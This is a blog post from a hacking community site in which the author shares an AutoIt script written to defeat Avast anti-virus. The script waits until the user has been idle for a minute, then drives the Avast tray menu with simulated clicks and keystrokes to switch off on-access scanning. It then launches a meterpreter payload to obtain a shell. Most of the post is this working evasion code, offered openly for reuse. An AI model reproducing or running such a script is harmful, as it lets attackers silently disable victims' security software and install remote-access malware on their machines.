After a 4 part investigation / introduction “I was working on tutorials” to bypassing anti-virus, an update to the target product slapped me in the face, halting the mechanisms I had used for circumvention, I needed to find a solution that would allow me to continue with my deployment of meterpreter and Avast_OFF is what I came up with.

I was looking for some-way, any-way to bypass the product in question just to see how easy it was with today's tools, I had seen AutoIT used in the past and it offered everything I needed “an easy way to program GUI interaction without learning to program” most applications are designed to interact with the end user and anti-virus products are no different so using AutoIT to mimic the users actions should work? so-long as the anti-virus product allows us to execute and the user behaved as expected the result was the same! “my payload is delivered and I get the shell I'm really after.

[The script]
-----CUT-----
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_icon=..\..\..\..\Program Files\AutoIt3\Icons\filetype-blank.ico
#AutoIt3Wrapper_UseUpx=n
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "SysTray_UDF.au3"
#include
$ApplicationX="ashDisp.exe"
Global $iIdleTime = _Timer_GetIdleTime()
; Wait for 60 seconds of inactivity.
While $iIdleTime < "60000"
Sleep(1000)
Global $iIdleTime = _Timer_GetIdleTime()
WEnd
MsgBox(0,"I Think were alone","if you left me longer than 60 second your in for it [" & $iIdleTime & "]",2,0);
$MouseReturn=MouseGetPos()
$class = "classname=Shell_TrayWnd"
$hControl = ControlGetHandle($class, "", "Button1")
; get tray position and move there.
$posTray = WinGetPos(_FindTrayToolbarWindow())
MouseMove($posTray[0], $posTray[1])
; If XP Hide Inactive Icons mode is active
If $hControl <> "" And ControlCommand($class, "", $hControl, "IsVisible","") Then
ControlClick($class, "", $hControl)
Sleep(1000)
EndIf
$index = _SysTrayIconIndex($ApplicationX)
If $index <> -1 Then
$pos = _SysTrayIconPos($index)
If $pos = -1 Then
MsgBox(0,"Not Found",$ApplicationX,30,0)
Exit
Else
MouseMove($pos[0], $pos[1])
MouseClick("left")
Sleep(500)
If Not WinActive("avast! On-Access Scanner","") Then WinActivate("avast! On-Access Scanner","")
WinWaitActive("avast! On-Access Scanner","")
Send("{ALTDOWN}t{ALTUP}")
Sleep(500)
Send("y")
Sleep(500)
Send("{ALTDOWN}o{ALTUP}")
EndIf
EndIf
MouseMove($MouseReturn[0],$MouseReturn[1])
sleep(3000)
MsgBox(0,"so far so good!","with any luck AV is now off and the payload is about to be launched",4,0)
Run("meterpreter.exe","","")
-----CUT-----

There is nothing new in this information it was just an exercise for my-self, but this is my only blog so I have posted the code here.

Views: 136

Comment

You need to be a member of Dissecting The Hack to add comments!

Join Dissecting The Hack

Latest Activity

Anton Vyacheslav is now a member of Dissecting The Hack
Dec 9, 2018
bernardorichard updated their profile
Nov 28, 2018
Sam Mccalla is now a member of Dissecting The Hack
Nov 19, 2018
bernardorichard is now a member of Dissecting The Hack
Oct 24, 2018

© 2019   Created by Marcus J. Carey.   Powered by

Badges  |  Report an Issue  |  Terms of Service